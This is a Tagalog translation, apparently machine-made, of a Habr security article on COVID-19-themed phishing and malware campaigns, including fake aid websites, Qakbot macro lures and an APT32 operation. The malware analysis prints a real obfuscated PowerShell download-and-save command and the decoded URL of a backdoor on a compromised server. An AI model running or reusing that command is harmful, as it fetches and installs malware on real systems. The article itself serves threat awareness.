Patuloy na sinasamantala ng mga umaatake ang paksang COVID-19, na lumilikha ng parami nang paraming banta para sa mga user na lubos na interesado sa lahat ng nauugnay sa epidemya. SA Napag-usapan na natin kung anong mga uri ng malware ang lumitaw pagkatapos ng coronavirus, at ngayon ay pag-uusapan natin ang tungkol sa mga diskarte sa social engineering na nakatagpo na ng mga gumagamit sa iba't ibang bansa, kabilang ang Russia. Ang mga pangkalahatang uso at mga halimbawa ay nasa ilalim ng pagbawas.
Tandaan sa Napag-usapan namin ang katotohanan na ang mga tao ay handang magbasa hindi lamang tungkol sa coronavirus at sa kurso ng epidemya, kundi pati na rin tungkol sa mga hakbang sa suporta sa pananalapi? Narito ang isang magandang halimbawa. Isang kawili-wiling pag-atake ng phishing ang natuklasan sa estado ng Germany ng North Rhine-Westphalia o NRW. Ang mga umaatake ay lumikha ng mga kopya ng website ng Ministry of Economy (), kung saan maaaring mag-aplay ang sinuman para sa tulong pinansyal. Ang ganitong programa ay talagang umiiral, at ito ay naging kapaki-pakinabang para sa mga scammer. Nang matanggap ang personal na data ng kanilang mga biktima, gumawa sila ng aplikasyon sa totoong website ng ministeryo, ngunit ipinahiwatig ang iba pang mga detalye ng bangko. Ayon sa opisyal na data, 4 na libong naturang pekeng kahilingan ang ginawa hanggang sa natuklasan ang scheme. Bilang resulta, ang $109 milyon na inilaan para sa mga apektadong mamamayan ay nahulog sa mga kamay ng mga manloloko.
Gusto mo ba ng libreng pagsusuri para sa COVID-19?
Ang isa pang makabuluhang halimbawa ng phishing na may temang coronavirus ay sa mga email. Naakit ng mga mensahe ang atensyon ng mga user na may alok na sumailalim sa libreng pagsubok para sa impeksyon sa coronavirus. Sa kalakip ng mga ito may mga pagkakataon ng Trickbot/Qakbot/Qbot. At nang ang mga nagnanais na suriin ang kanilang kalusugan ay nagsimulang "punan ang nakalakip na form," isang malisyosong script ang na-download sa computer. At upang maiwasan ang pagsubok sa sandboxing, sinimulan ng script ang pag-download ng pangunahing virus pagkatapos lamang ng ilang panahon, nang kumbinsido ang mga sistema ng proteksyon na walang malisyosong aktibidad na magaganap.
Madali din ang pagkumbinsi sa karamihan ng mga user na paganahin ang mga macro. Upang gawin ito, ginamit ang isang karaniwang trick: upang punan ang questionnaire, kailangan mo munang paganahin ang mga macro, na nangangahulugang kailangan mong magpatakbo ng VBA script.
Tulad ng nakikita mo, ang script ng VBA ay espesyal na naka-mask mula sa mga antivirus.
Ang Windows ay may tampok na paghihintay kung saan ang application ay naghihintay ng /T <segundo> bago tanggapin ang default na "Oo" na sagot. Sa aming kaso, ang script ay naghintay ng 65 segundo bago tanggalin ang mga pansamantalang file:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
At habang naghihintay, na-download ang malware. Isang espesyal na PowerShell script ang inilunsad para dito:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pagkatapos i-decode ang Base64 value, dina-download ng PowerShell script ang backdoor na matatagpuan sa dating na-hack na web server mula sa Germany:
http://automatischer-staubsauger.com/feature/777777.pngat i-save ito sa ilalim ng pangalan:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ ay tinanggal kapag pinapatakbo ang 'tmps1.bat' na file na naglalaman ng command cmd /c mkdir ""C:UsersPublictmpdir"".
Naka-target na pag-atake sa mga ahensya ng gobyerno
Bilang karagdagan, ang mga analyst ng FireEye ay nag-ulat kamakailan ng isang naka-target na pag-atake ng APT32 na naglalayong sa mga istruktura ng gobyerno sa Wuhan, pati na rin sa Chinese Ministry of Emergency Management. Ang isa sa mga ipinamahagi na RTF ay naglalaman ng isang link sa isang artikulo ng New York Times na pinamagatang . Gayunpaman, sa pagbabasa nito, na-download ang malware (tinukoy ng mga analyst ng FireEye ang instance bilang METALJACK).
Kapansin-pansin, sa oras ng pagtuklas, wala sa mga antivirus ang nakakita sa pagkakataong ito, ayon sa Virustotal.
Kapag naka-down ang mga opisyal na website
Ang pinakakapansin-pansing halimbawa ng pag-atake ng phishing ay nangyari sa Russia noong isang araw lang. Ang dahilan nito ay ang paghirang ng isang pinakahihintay na benepisyo para sa mga batang may edad 3 hanggang 16 na taon. Nang ipahayag ang simula ng pagtanggap ng mga aplikasyon noong Mayo 12, 2020, milyun-milyon ang sumugod sa website ng Mga Serbisyo ng Estado para sa pinakahihintay na tulong at ibinaba ang portal na hindi mas masahol pa kaysa sa isang propesyonal na pag-atake ng DDoS. Nang sabihin ng pangulo na "Hindi nakayanan ng mga Serbisyo ng Gobyerno ang daloy ng mga aplikasyon," nagsimulang makipag-usap ang mga tao online tungkol sa paglulunsad ng isang alternatibong site para sa pagtanggap ng mga aplikasyon.
Ang problema ay ang ilang mga site ay nagsimulang gumana nang sabay-sabay, at habang ang isa, ang tunay sa posobie16.gosuslugi.ru, ay talagang tumatanggap ng mga aplikasyon, higit pa .
Nakakita ang mga kasamahan mula sa SearchInform ng humigit-kumulang 30 bagong mapanlinlang na domain sa .ru zone. Ang Infosecurity at Softline Company ay nasubaybayan ang higit sa 70 katulad na mga pekeng website ng serbisyo ng gobyerno mula noong simula ng Abril. Ang kanilang mga tagalikha ay nagmamanipula ng mga pamilyar na simbolo at gumagamit din ng mga kumbinasyon ng mga salitang gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, at iba pa.
Hype at social engineering
Kinukumpirma lang ng lahat ng mga halimbawang ito na matagumpay na pinagkakakitaan ng mga umaatake ang paksa ng coronavirus. At kung mas mataas ang panlipunang tensyon at mas hindi malinaw na mga isyu, mas maraming pagkakataon ang mga scammer na magnakaw ng mahalagang data, pilitin ang mga tao na ibigay ang kanilang pera nang mag-isa, o mag-hack ng mas maraming computer.
At dahil ang pandemya ay pinilit ang mga potensyal na hindi handa na mga tao na magtrabaho mula sa bahay nang maramihan, hindi lamang personal, kundi pati na rin ang data ng korporasyon ay nasa panganib. Halimbawa, kamakailan ang mga gumagamit ng Microsoft 365 (dating Office 365) ay sumailalim din sa pag-atake ng phishing. Nakatanggap ang mga tao ng napakalaking "na-miss" na voice message bilang mga attachment sa mga titik. Gayunpaman, ang mga file ay talagang isang HTML na pahina na nagpadala ng mga biktima ng pag-atake sa . Bilang resulta, pagkawala ng access at kompromiso ng lahat ng data mula sa account.
Pinagmulan: www.habr.com